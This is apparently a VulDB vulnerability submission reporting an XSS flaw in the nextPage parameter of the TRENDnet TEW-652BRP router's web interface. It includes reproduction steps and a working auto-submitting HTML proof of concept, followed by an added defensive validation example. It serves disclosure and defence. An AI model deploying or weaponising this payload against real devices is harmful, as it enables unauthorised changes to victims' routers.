| Title | An XSS on TRENDnet router TEW-652BRP |
|---|
| Description | # XSS on TRENDnet router TEW-652BRP
## Overview
* Type: XSS
* Supplier: TRENDnet (https://www.trendnet.com/)
* Product: TRENDnet TEW-652BRP (Version v3.2R, https://www.trendnet.com/support/support-detail.asp?prod=235_TEW-652BRP)
* Firmware download: https://downloads.trendnet.com/tew-652brp_v3.2/firmware/fw_tew-652brp_v3(3.04b01).zip
* Affected version: latest version 3.04B01
* Bug URL: http://192.168.10.1/get_set.ccp
## Description
An XSS vulnerability exists in a parameter of a POST request; it is triggered after logging in to the web interface.
The device uses a plaintext password to log in to the web interface, so passwords are easily leaked from the HTTP traffic. This vulnerability can be exploited easily.
## Reproduce and PoC
### Steps to Reproduce
I have put the PoC (HTML code) in the next section. You need to configure the device's web IP address in the URL.
Log in to the web management interface in the browser, then open the PoC in a new page, and an alert will pop up.
Note: The alert window flashes before going to the next page, so I suggest using the Burp Suite proxy to slow things down. You can also check the response to locate the XSS injection.
### Proof of Concept
Below is the PoC (HTML code). Save the code into a file (xss.html) and open it in the browser after logging in to the target's web interface.
```
<!DOCTYPE html>
<html>
<head>
<script>
window.onload = function() {
document.getElementById("postsubmit").click();
}
</script>
<meta charset="utf-8">
<title></title>
</head>
<body>
<form method="post" action="http://192.168.10.1/get_set.ccp">
<input id="ccp_act" type="text" name="ccp_act" value="set"/>
<input id="ccpSubEvent" type="text" name="ccpSubEvent" value="CCP_SUB_URLFILTER"/>
<input id="nextPage" type="text" name="nextPage" value="domain_filter.htm');alert('XSS');//"/>
<input id="urlFilterList_ManagedURL_1.1.2.0.0" type="text" name="urlFilterList_ManagedURL_1.1.2.0.0" value="dummy.org"/>
<input id="postsubmit" type="submit" value="submit" />
</form>
</body>
</html>
```
|
|---|
| User | leetsun (UID 39457) |
|---|
| Submission | 27.01.2023 14:06 (3 years ago) |
|---|
| Moderation | 02.02.2023 09:10 (6 days later) |
|---|
| Status | Accepted |
|---|
| VulDB Entry | 220019 [TRENDnet TEW-652BRP 3.04b01 Web Management Interface get_set.ccp nextPage Cross Site Scripting] |
|---|
| Points | 17 |
|---|
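
One way a web handler could defend against the `nextPage` injection described in the submission above, shown as an added example that is not code from the submission or from TRENDnet firmware. It assumes the value is reflected into a quoted JavaScript string in the response (as the PoC value suggests) and that legitimate page names are plain `.htm` file names; `safeNextPage`, `jsLiteral`, `redirectScript` and the `index.htm` fallback are hypothetical.

```javascript
// Added example: allowlist validation plus output encoding for nextPage.
// Assumption: legitimate page names are plain file names ending in .htm.
const PAGE_NAME = /^[A-Za-z0-9_-]{1,64}\.htm$/;

// Parse an application/x-www-form-urlencoded body and return nextPage,
// or null when it is missing, repeated, or not a plain page name.
function safeNextPage(body) {
  const values = new URLSearchParams(body).getAll("nextPage");
  if (values.length !== 1) return null;
  return PAGE_NAME.test(values[0]) ? values[0] : null;
}

// Defense in depth: encode any string as a JavaScript literal that cannot
// close the string or the surrounding inline <script> element.
function jsLiteral(value) {
  return JSON.stringify(String(value)).replace(
    /[<>&'\u2028\u2029]/g,
    (c) => "\\u" + c.charCodeAt(0).toString(16).padStart(4, "0")
  );
}

// Hypothetical redirect snippet a handler could emit after saving settings.
// Rejected values fall back to a fixed page (assumed name: index.htm).
function redirectScript(body, fallback = "index.htm") {
  const page = safeNextPage(body) ?? fallback;
  return "<script>location.replace(" + jsLiteral(page) + ");</script>";
}

// Constructed sample input: the form fields of the PoC above, URL-encoded.
const pocBody = new URLSearchParams({
  ccp_act: "set",
  ccpSubEvent: "CCP_SUB_URLFILTER",
  nextPage: "domain_filter.htm');alert('XSS');//",
  "urlFilterList_ManagedURL_1.1.2.0.0": "dummy.org",
}).toString();

// Constructed benign request for comparison.
const okBody = "ccp_act=set&nextPage=domain_filter.htm";

console.log(redirectScript(pocBody));
console.log(redirectScript(okBody));
```

The allowlist is the primary control; the literal encoder covers any other place where request data reaches inline script.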